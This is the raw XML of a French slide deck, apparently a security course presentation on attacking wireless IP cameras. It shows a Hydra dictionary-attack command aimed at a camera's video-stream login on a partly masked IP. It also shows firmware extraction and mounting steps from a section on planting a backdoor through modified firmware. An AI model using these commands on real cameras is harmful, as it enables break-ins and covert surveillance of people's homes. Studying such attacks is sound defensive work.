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0" r:id="rId10"/>
    <p:sldId id="278" r:id="rId11"/>
    <p:sldId id="270" r:id="rId12"/>
    <p:sldId id="272" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="276" r:id="rId15"/>
    <p:sldId id="280" r:id="rId16"/>
    <p:sldId id="279" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="266" r:id="rId19"/>
    <p:sldId id="268" r:id="rId20"/>
    <p:sldId id="265" r:id="rId21"/>
    <p:sldId id="277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2" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70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32A19-E10D-4ABF-87C4-DA8942820D16}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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F4224-0736-4C2D-B3AC-45A42AC568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6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3B57258-559C-40E7-BC94-56392AC37E2C}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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C4D4A1F-29D3-42A9-B81C-329655C3400F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2F2B-8252-4E01-9D2A-11BABC024C5D}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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6A45-00FA-4B51-89DC-94662A5F3B78}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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796-BD92-49B0-9AF0-6880ED1920CD}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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2494F9-80DA-4AF6-A756-D5C409861DA3}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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C4D4A1F-29D3-42A9-B81C-329655C3400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36BC-C1E1-4EDE-AB1C-9034D83FB054}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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211D-D9D0-4146-BECE-D3AE875B1302}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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7ECB-6E73-44B4-ADA5-52CE29FD89E5}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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1BDD-C84F-43AC-9475-E7CCE8DFD532}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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3A21-6859-4002-B037-07DAB15BCCDC}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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5116-C0AD-49A4-ADEB-05A6B34E60E1}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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8580A30-50D0-4E64-80C6-58709F8E70C0}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/12/2014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4D4A1F-29D3-42A9-B81C-329655C3400F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ldov/webui" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/artemharutyunyan/getmecam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oscam.co.za/content/25-latest-firmware-updat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tor.ca/portals/17/Presentations13/ARTEM%20-Watching_the_watchers_%20hacking_wireless_IP_security_cameras.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=518908" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://justreadthecode.wordpress.com/2013/09/26/ipcamera-fu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sidetrust.blogspot.fr/2011/08/using-hydra-to-dictionary-attack-web.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://archive.hack.lu/2013/ipcams-research-falcon-riva.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilitie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rakith/foscam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rakith/foscamTools" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.coresecurit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APPY Guillaume</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>LANDRIEU Alexis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9 Tester les mots de passe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10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25824"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Attaque par dictionnaire avec Hydra :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Commande :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -L /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/dico2.txt -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/dico2.txt 82.XXX.XXX.X6 -s 8888 http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>videostream.asf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?:user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>^USER^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>^PASS^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;Login=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Login:ÉCHEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> d'autorisation."</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://2.bp.blogspot.com/_2IvFH57W8Hc/TTXu4Vhl26I/AAAAAAAAAG0/zw3gt-gIBFw/s320/xhyd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580" y="0"/>
            <a:ext cx="2166625" cy="216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47" y="3721225"/>
            <a:ext cx="8616884" cy="221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10 Mise en place d’une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Backdoor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11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3433936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Installation d’un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> modifié :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Outils :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Getcamtool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/artemharutyunyan/getmecamtool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Foscam_pkmgr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/moldov/webui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>)(gawk)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Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> FOSCAN :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.foscam.co.za/content/25-latest-firmware-updates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>
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR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10 Mise en place d’une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Backdoor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12</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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457200" y="1219200"/>
            <a:ext cx="8363272" cy="501811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sz="2600" dirty="0"/>
              <a:t>Commande d’extraction du binaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" smtClean="0"/>
              <a:t>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800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getmecamtool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sysextract</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -x ../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/11.22.2.47/System\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/lr_cmos_11_22_2_47.bin -o /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/TEMPBINSYS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System firmware file has valid structure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>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux.bin size: 759609 bytes, romfs.img size: 1041408 bytes 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>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Extracting /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/TEMPBINSYS/linux.bin(759609 bytes)...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>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Extracting /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/TEMPBINSYS/romfs.img(1041408 bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)…</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console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sz="2600" dirty="0" smtClean="0"/>
              <a:t>Montage de l’image Système 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700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/TEMPBINSYS# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lh</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>total 1,8M</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-r--r-- 1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 742K </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>déc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.   3 22:33 linux.bin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rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-r--r-- 1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1017K </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>déc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3 22:33 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>romfs.img</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0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700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/TEMPBINSYS# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mount romfs.img /media/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>romCustom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/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700" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/media/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>romCustom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lh</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>total 0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bin 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dev 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etc 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flash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home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proc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swap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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="23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10 Mise en place d’une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Backdoor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13</a:t>
            </a:fld>
